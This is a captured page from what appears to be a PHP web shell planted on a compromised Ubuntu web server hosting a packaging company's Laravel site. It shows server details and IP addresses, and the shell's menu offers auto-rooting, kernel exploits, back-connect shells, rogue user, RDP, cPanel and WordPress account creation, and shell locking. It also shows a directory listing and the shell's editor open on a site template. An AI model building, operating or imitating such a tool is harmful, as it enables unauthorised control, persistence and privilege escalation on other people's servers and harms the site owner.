Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.230.96
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
828
B
-rw-r--r--
beat_my_quote.blade.php
11.37
KB
-rw-r--r--
blogs.blade.php
4.63
KB
-rw-r--r--
category_products.blade.php
49.93
KB
-rw-r--r--
contact_us.blade.php
9.4
KB
-rw-r--r--
custom_printed_boxes.blade.php
57.52
KB
-rw-r--r--
dashboard.blade.php
4.07
KB
-rw-r--r--
faqs.blade.php
3.86
KB
-rw-r--r--
imagesitemap.blade.php
1.89
KB
-rw-r--r--
index.blade.php
17.49
KB
-rw-r--r--
index_old.blade.php
9.71
KB
-rw-r--r--
latest_offers.blade.php
58.09
KB
-rw-r--r--
personalized_packaging_boxes.b...
6.48
KB
-rw-r--r--
portfolio.blade.php
2.29
KB
-rw-r--r--
post.blade.php
1.32
KB
-rw-r--r--
privacy_security.blade.php
829
B
-rw-r--r--
product_detail.blade.php
110.85
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
13.68
KB
-rw-r--r--
sitemap.blade.php
5.96
KB
-rw-r--r--
sitemapxml.blade.php
2.34
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
760
B
-rw-r--r--
thank_you.blade.php
1.12
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : post.blade.php
@extends('layouts.app') @section('contents') <?php if(isset($_GET['gclid'])){ $gclid=$_GET['gclid']; }else{ $gclid=''; } ?> <?php if(isset($_GET['MSCLKID'])){ $MSCLKID=$_GET['MSCLKID']; }else{ $MSCLKID=''; } ?> <style> .img-fluid{ height: 350px !important; } </style> <section> <div class="container"> <div class="row"> <div class="col-sm-8 col-xs-12 pt-5"> <h1>{{ $post->post_title }}</h1> <p><i class="fa fa-calendar" aria-hidden="true"></i> {{ $post->created }}</p> <img alt="{{ $post->featured_alt }}" title="{{ $post->featured_alt }}" src="{{ asset("assets/blog-posts/".$post->featured_image) }}" width="100%"> <div class="opi-post-detail"><p>{!! $post->post_detail !!}</p></div> </div> <div class="col-md-4 col-12 pt-5"> @include('layouts.common.right_side_bar') </div> </div> </div> </section> @endsection @push('styles') <link rel="stylesheet" href="{{ asset("assets/css/static_pages.css") }}" type="text/css"> <link rel="stylesheet" href="{{ asset("assets/css/blogs.css") }}" type="text/css"> @endpush
Close